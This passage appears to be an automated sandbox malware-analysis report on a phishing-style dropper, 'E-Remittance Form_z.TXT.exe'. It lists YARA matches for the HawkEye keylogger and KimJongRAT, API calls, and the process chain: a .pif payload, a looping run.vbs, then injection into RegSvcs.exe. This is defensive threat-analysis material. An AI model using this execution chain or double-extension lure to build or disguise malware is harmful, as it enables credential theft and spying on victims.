          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00A998F010_2_00A998F0
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA213610_2_00AA2136
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AAA13710_2_00AAA137
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AB427D10_2_00AB427D
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ADF3A610_2_00ADF3A6
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00A998F010_2_00A998F0
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA250810_2_00AA2508
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD655F10_2_00AD655F
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA372110_2_00AA3721
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00A9F73010_2_00A9F730
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AB088F10_2_00AB088F
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA28F010_2_00AA28F0
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AAC8CE10_2_00AAC8CE
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA190310_2_00AA1903
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ADEAD510_2_00ADEAD5
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00B0EA2B10_2_00B0EA2B
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AB3BA110_2_00AB3BA1
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA1D9810_2_00AA1D98
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AB0DE010_2_00AB0DE0
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD2D2D10_2_00AD2D2D
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD4EB710_2_00AD4EB7
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ADCE8D10_2_00ADCE8D
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AB1F2C10_2_00AB1F2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170991228_2_01709912
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170206828_2_01702068
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01700C4828_2_01700C48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01706C2828_2_01706C28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017004E828_2_017004E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017054B828_2_017054B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703F6828_2_01703F68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01702ECD28_2_01702ECD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017029F828_2_017029F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017029E928_2_017029E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017039D728_2_017039D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170398128_2_01703981
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170787028_2_01707870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017048E028_2_017048E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017038E628_2_017038E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017010E828_2_017010E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703B6028_2_01703B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703B1E28_2_01703B1E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703BF128_2_01703BF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703BCE28_2_01703BCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01700BA828_2_01700BA8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703A7728_2_01703A77
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703A0228_2_01703A02
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703ADD28_2_01703ADD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703AAA28_2_01703AAA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170056228_2_01700562
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170356728_2_01703567
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170356828_2_01703568
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703D4028_2_01703D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170053B28_2_0170053B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170452828_2_01704528
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017005ED28_2_017005ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703DDD28_2_01703DDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703DA028_2_01703DA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017005A628_2_017005A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703C7328_2_01703C73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703C1D28_2_01703C1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170540F28_2_0170540F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017004D828_2_017004D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017054A828_2_017054A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170174D28_2_0170174D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01709F9028_2_01709F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01709F8628_2_01709F86
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703E7528_2_01703E75
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01708E3828_2_01708E38
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01708E2828_2_01708E28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01706E1028_2_01706E10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_01703E1A28_2_01703E1A
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 07E5F6D7EC7CCBC3D742658E9161D799934C6F7F6A3EBF560F361B4EE1730B6A
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: String function: 00AA8115 appears 39 times
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: String function: 00AA333F appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: String function: 00A91D10 appears 31 times
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: String function: 00AA14F7 appears 45 times
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: String function: 00AD59E6 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: String function: 00AA6B90 appears 71 times
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: String function: 009FE2F0 appears 31 times
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: String function: 009FD870 appears 35 times
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: String function: 009FD940 appears 51 times
          Source: urdavsa.pif.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: E-Remittance Form_z.TXT.exe, 00000001.00000002.328087251.0000000001A70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs E-Remittance Form_z.TXT.exe
          Source: E-Remittance Form_z.TXT.exe, 00000001.00000002.330334339.0000000005760000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs E-Remittance Form_z.TXT.exe
          Source: E-Remittance Form_z.TXT.exe, 00000001.00000002.330306521.0000000003A20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWindows.Storage.dll.MUIj% vs E-Remittance Form_z.TXT.exe
          Source: E-Remittance Form_z.TXT.exe, 00000001.00000002.330172881.0000000003910000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs E-Remittance Form_z.TXT.exe
          Source: E-Remittance Form_z.TXT.exe, 00000001.00000002.330293563.0000000003A00000.00000002.00000001.sdmpBinary or memory string: originalfilename vs E-Remittance Form_z.TXT.exe
          Source: E-Remittance Form_z.TXT.exe, 00000001.00000002.330293563.0000000003A00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs E-Remittance Form_z.TXT.exe
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeSection loaded: dxgidebug.dllJump to behavior
          Source: E-Remittance Form_z.TXT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 28.2.RegSvcs.exe.7da834a.4.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
          Source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
          Source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
          Source: 28.3.RegSvcs.exe.4aedbda.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.3.RegSvcs.exe.4aedbda.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.2.RegSvcs.exe.7d50000.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.3.RegSvcs.exe.4a95890.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.2.RegSvcs.exe.7d50000.3.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.2.RegSvcs.exe.7da834a.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.3.RegSvcs.exe.4a95890.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.3.RegSvcs.exe.4a95bd5.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 28.2.RegSvcs.exe.7d50345.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
          Source: 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
          Source: 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
          Source: 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
          Source: Process Memory Space: urdavsa.pif PID: 5552, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
          Source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/20@0/0
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009E6D06 GetLastError,FormatMessageW,1_2_009E6D06
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_00AC33A3
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AF4AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,10_2_00AF4AEB
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AED606 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,10_2_00AED606
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AC3EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,FindCloseChangeNotification,2_2_00AC3EC5
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AFE0F6 CoInitialize,CoCreateInstance,CoUninitialize,10_2_00AFE0F6
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009F963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_009F963A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\0afb590f-6441-4e30-9017-486274a19cc9
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeFile created: C:\Users\user\AppData\Local\Temp\82139548Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs'
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCommand line argument: sfxname1_2_009FCBB8
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCommand line argument: sfxstime1_2_009FCBB8
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCommand line argument: STARTDLG1_2_009FCBB8
          Source: E-Remittance Form_z.TXT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeFile read: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe 'C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe'
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htg
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeFile written: C:\Users\user\AppData\Local\Temp\82139548\pojm.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: E-Remittance Form_z.TXT.exeStatic file information: File size 1441541 > 1048576
          Source: E-Remittance Form_z.TXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: E-Remittance Form_z.TXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: E-Remittance Form_z.TXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: E-Remittance Form_z.TXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: E-Remittance Form_z.TXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
